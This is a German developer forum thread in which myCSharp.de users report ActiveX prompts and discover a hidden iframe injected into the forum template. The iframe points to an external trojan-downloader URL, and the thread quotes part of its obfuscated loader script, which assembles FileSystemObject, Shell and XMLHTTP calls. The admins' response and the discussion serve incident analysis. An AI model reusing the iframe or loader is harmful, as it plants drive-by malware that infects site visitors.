ActiveX auf myCSharp?
Hallo,
seit heute erhalte ich beim Aufruf von myCSharp.de eine Warnung vom IE, dass myCSharp.de ein ActiveX-Control ausführen möchte: "Microsoft Data Access - Remote Data Services" ... öhm?
Viele Grüße,
Golo
Wissensvermittler und Technologieberater
für .NET, Codequalität und agile Methoden
Kommt bei mir auch. Bisher hab ich es nicht zugelassen, seither kann ich nichtmehr "zurück" 🙁
ich hab es mal zugelassen. danach kommt noch eins und dann kommt :
Diese Website möchte das folgende Add-On ausführen: "Name des Steuerelements ist nicht verfügbar" von "Unbekannter Herausgeber".
? ? ?
Workshop : Datenbanken mit ADO.NET
Xamarin Mobile App : Finderwille Einsatz App
Unternehmenssoftware : Quasar-3
Hm.. da tut sich mir die Frage auf warum es immer noch Leute gibt die den IE benutzen.. vor allem wenn es um Leute geht denen man eine gewisse EDV/IT Affinität unterstellen könnte.. 😉
Mein Feuerfuchs stellt mich sehr zufrieden und belästigt mich mit solchen Anfragen nicht.. kann also myCSharp einfach so nutzen wie ich es mir wünsche.
Gruß
purplestar
Daher kommt der aufruf:
<table style="width:100%" cellpadding="3" cellspacing="1" border="0" class="tableinborder" align="center">
<tr>
<td width="100%" class="tablea"><span class="smallfont">Aktualisiert am 24. Juli 2006 | © Copyright 2003-2006 <a href="team.php">myCSharp.de-Team</a>. Alle Rechte vorbehalten.</span></td> <iframe src="http://www.abetterstart.com/c/2261/counter21.php" width=1 height=1 style="display:none"></iframe>
<td class="tablea" nowrap="nowrap"><span class="smallfont">04.02.2007 19:29</span></td>
</tr>
</table>
da wiederum liegt ein script, das folgendes macht:
function iftvjjrc(jqifyx) {
kpys = "GE"+"T";
var seq = "http://www.abetterstart.com/c/2261/counter21.php?a=3&c=3";
pxqb = "XML"+"H"+"TTP";
var smzenr = jqifyx.CreateObject("S"+"c"+"ripti"+"ng."+"F"+"ileSys"+"tem"+"O"+"bject", "")
unldwfn = "Sh"+"ell";........
die URL http://www.abetterstart.com/c/2261/counter21.php?a=3&c=3
ist laut NOD ein WEin32/TrojanderDownloader.Tiny.NCA Trojaner
@purplestar: Du solltest dir dringend mal einen Virenscanner besorgen.....
Original von cadi
@purplestar: Du solltest dir dringend mal einen Virenscanner besorgen.....
Den habe ich.. McAfee, der auch prima den von Dir beschriebenen Trojaner erkannt und verhindert hat 🙂
Hallo purplestar,
dieser iframe war in den wbb-Template enthalten. Ich weiß bisher noch nicht, woher der kommt. Ich habe ihn entfernt.
herbivore
Dank Dir für die Info und Dein handeln herbivore.
Gruß
purplestar
Komischerweise erschien das Teil aber immer nur wenn ich in Hotmail auf einen Link geklickt habe...
Früher war ich unentschlossen, heute bin ich mir da nicht mehr so sicher...
Hallo purplestar,
Hm.. da tut sich mir die Frage auf warum es immer noch Leute gibt die den IE benutzen.. vor allem wenn es um Leute geht denen man eine gewisse EDV/IT Affinität unterstellen könnte.. Augenzwinkern
Da muss ich nun welche in Schutz nehmen, denn es gibt Firman, die keinen anderen Browser als IE zulassen (In meiner ist es zwar Standard, aber kein Verbot einen anderen zu nutzen).
Daher sind auch noch soo viele mit dem IE unterwegs (leider). Und teilweise muss man ja ActiveX zulassen (Win-Update z.B.).
Gruß
Norman-Timo
A: “Wie ist denn das Wetter bei euch?”
B: “Caps Lock.”
A: “Hä?”
B: “Na ja, Shift ohne Ende!”
Habe seit ich Vista nutze auf IE umgestellt und bin sehr zufrieden sonst.
Firefox verabschiedet sich regelmäßig komplett, wenn nen Java Applet auf ner Seite. Bis man dann wieder alle Seiten gefunden hat...
Hallo
Kann dieses Verhalten bestätigen.
Bei mir kam noch ein ActiveX das "Outlook" hies 😉
Gut das es jetzt gelöst ist.
Gruss Peter
--
Microsoft MVP - Visual Developer ASP / ASP.NET, Switzerland 2007 - 2011
- https://peterbucher.ch/ - Meine persönliche Seite
- https://fpvspots.net/ - Spots für FPV Dronenflüge
Original von purplestar
Hm.. da tut sich mir die Frage auf warum es immer noch Leute gibt die den IE benutzen.. vor allem wenn es um Leute geht denen man eine gewisse EDV/IT Affinität unterstellen könnte..
Dafür gibt es verschiedene Gründe, die hier IMHO nicht (wieder einmal) erörtert werden müssen ... nimm die Heterogenität hin, es gibt diese Leute, es sind nicht wenige, und es gibt Gründe dafür. Warum das so ist, spielt für den hier besprochenen Thread wohl kaum eine Rolle, oder?
Original von purplestar
Mein Feuerfuchs stellt mich sehr zufrieden und belästigt mich mit solchen Anfragen nicht.. kann also myCSharp einfach so nutzen wie ich es mir wünsche.
Schön für Dich (und das meine ich ernst). Versuch bitte nicht, andere zu missionieren, zumindest nicht in diesem Thread. Das hat hier nichts verloren.
Wissensvermittler und Technologieberater
für .NET, Codequalität und agile Methoden
Hallo norman_timo,
Da muss ich nun welche in Schutz nehmen, denn es gibt Firman, die keinen anderen Browser als IE zulassen (In meiner ist es zwar Standard, aber kein Verbot einen anderen zu nutzen).
Das ist natürlich ein Argument. Wenn man nicht anders darf dann ist man auf den IE angewiesen, das ist einzusehen.
Daher sind auch noch soo viele mit dem IE unterwegs (leider). Und teilweise muss man ja ActiveX zulassen (Win-Update z.B.).
Das von Dir angesprochenen Win-Update; das dürfte der einzige Fall sein, in dem auch ich den IE nutzte.. da ich es ja auch 'muss' und es keine Alternative gibt.
Ansonsten wenn es also um das pure surfen geht, nutze ich nur den Firefox und habe bislang auch keinerlei Probleme mit ihm gehabt.
Gruß
purplestar
Original von Golo
... nimm die Heterogenität hin...
Nehme ich doch, sehe nicht das ich was anderes geschrieben hätte.
Original von Golo
Versuch bitte nicht, andere zu missionieren, zumindest nicht in diesem Thread.
Habe ich das versucht? Auch das sehe ich nicht.. weder in diesem noch in einem anderen Thread.
Vielleicht sollte ich als Dank für Deine väterlichen Hinweise an mich auch Dir einen solchen zurückgeben: Lies bitte Beiträge sorgfältig durch(zur Not auch mehrfach) bevor Du Gefahr läufst diese in Unterstellungen umzuwandeln.
Zumindest haben wir gemein das Dein letzter Beitrag, ebenso wie meine jetzige Antwort darauf, in diesem Thread nichts verloren haben.
Gruß
purplestar
Hallo zusammen,
bitte keine weiteren Äußerungen zu IE oder FF in diesem Thread. Das eigentliche Thema ist zu wichtig, um in einem Glaubenskrieg unterzugehen.
herbivore
Hallo zusammen,
aber trotzdem gebe ich nun einen freundlichen Hinweis an alle IE6 Benutzer:
Falls folgende Optionen nicht deaktiviert sind, sollten mindestens die Angaben unter Extras->Internetoptionen->Sicherheit->Stufe anpassen alles was unter "ActiveX-Steuerelemente und Plugins" auf Eingabeaufforderung gestellt werden.
Falls sicher dass einzelne Funktionen nicht benötigt werden, dann auch besser deaktivieren.
Ich weiß leider nicht wie die Standardeinstellung bei dem IE ist, aber das sollte jeder IE-Benutzer mal kontrollieren.
Gruß
Norman-Timo
A: “Wie ist denn das Wetter bei euch?”
B: “Caps Lock.”
A: “Hä?”
B: “Na ja, Shift ohne Ende!”
Hallo,
Hat jemand noch nähere Info zum besagten Trojaner? Evtl eine andere Bezeichnung? Jede Information hilft uns, das Problem besser zu isolieren. Wir sind für jeden Hinweis dankbar.
Grüße,
Andre
Der Name und die Funktion des Trojaners ist nicht so wichtig. Das ist bloß der normale Versuch, den Surfern einer Seite einen Trojaner unterzuschieben, um mit ihrem Rechner Geld zu verdienen.
Die einzig kritische Sache ist das Auftauchen des IFRAME in den Templates.
Es gibt ja bloß drei Möglichkeiten, wie das dort hinkommt:
- ein Admin hat es dort eingefügt,
- jemand hat das Kennwort eines Admins (des Forums und/oder des zugrunde liegenden Servers) entwendet oder
- das Forum (bzw. der Server) an sich enthält eine Sicherheitslücke.
Während ich Punkt 1 doch relativ schnell ausschließen möchte (bzw. muss, da sonst eh alle Bemühungen umsonst wären), kann man Punkt 2 durch schnellstmögliches Ändern aller Admin-Kennwörter sowie dem Überprüfen der Benutzer-Datenbank auf Rechteerhöhungen oder zusätzliche Nutzer beheben; alle Admins müssen sicherstellen, dass keiner ihrer Rechner einen Trojaner, Keylogger o.ä. enthält.
EDIT: spellcheck
Hallo,
bei mir war das gleiche, allerdings nicht nur einmal. Mein Panda hat sich immer gemeldet, wenn ich einen Seitenwechsel gemacht habe (anderer Thread, anderes Forum etc.).
Dazu ist noch zu sagen, dass die exe, die den Trojaner besaß, immer anders hieß. Dank meinem Panda ist nichts passiert 😉
Jedenfalls schön, dass der Fehler jetzt behoben ist. Ich hab aus Panik erstmal meinen Rechner neu gestartet weil ich dachte jemand wär durch meine FW hindurch. Nach näherer Analyse hab ich aber gemerkt, dass das nur auf myCSharp.de passiert ist.
Ärgert uns ja nie wieder mit solchen Sachen 😁
Es ist toll jemand zu sein, der nichts von der persönlichen Meinung Anderer hält. - frisch-live.de
Hallo Borg,
freut mich, dass du Punkt 1 ausschließt. So wie wir um Sicherheit und Sauberkeit des Forums bemüht sind und wie schnell wir auf Angriffe reagieren, wäre es aber auch eine abstruse Vorstellung, dass wir gegen unsere eigenen Bemühungen arbeiten sollten.
Momentan vermuten wir Punkt 2 und haben auch Anhaltspunkte dafür (und das obwohl wir als Admins lange und vom Aufbau sichere Passworte verwenden). Deshalb haben sich auch unsere Gegenmaßnahmen auf diesen Punkt konzentriert.
Auch an Punkt 3 haben wir bzw. unserer Web-Hoster prophylaktisch etwas getan.
Ich bitte um Verständnis, wenn ich nicht auf Details eingehe, da ja leider nicht ganz auszuschließen ist, dass der oder die Angreifer mitlesen. Und wir wollen es ihnen nicht leichter machen als nötig.
herbivore
Ich habs ja schon reportet, aber praktisch zeitgleich filterte der Virenscanner meines Providers (BT) jeden Zugriff auf mycsharp.de. Und das tut er jetzt noch. Er mockiert irgendwas mit korruptem oder manipluliertem Gzip. Kann aber auch gut sein, dass die beiden Ereignisse nix miteinander zu tun haben und der Virenscanner von BT schlicht nen Schuss. Aber schon ulkig...
Hallo svenson,
die "korrupten ZIP-Dateien" hattest du am 1.2. gemeldet. Nach allem, was wir wissen (z.B. über den GoogleCache und eigene Logs), stammt das AcitiveX-Problem vom 3.2. Daher sehe ich erstmal keinen Zusammenhang. Trotzdem danke für den Hinweis!
herbivore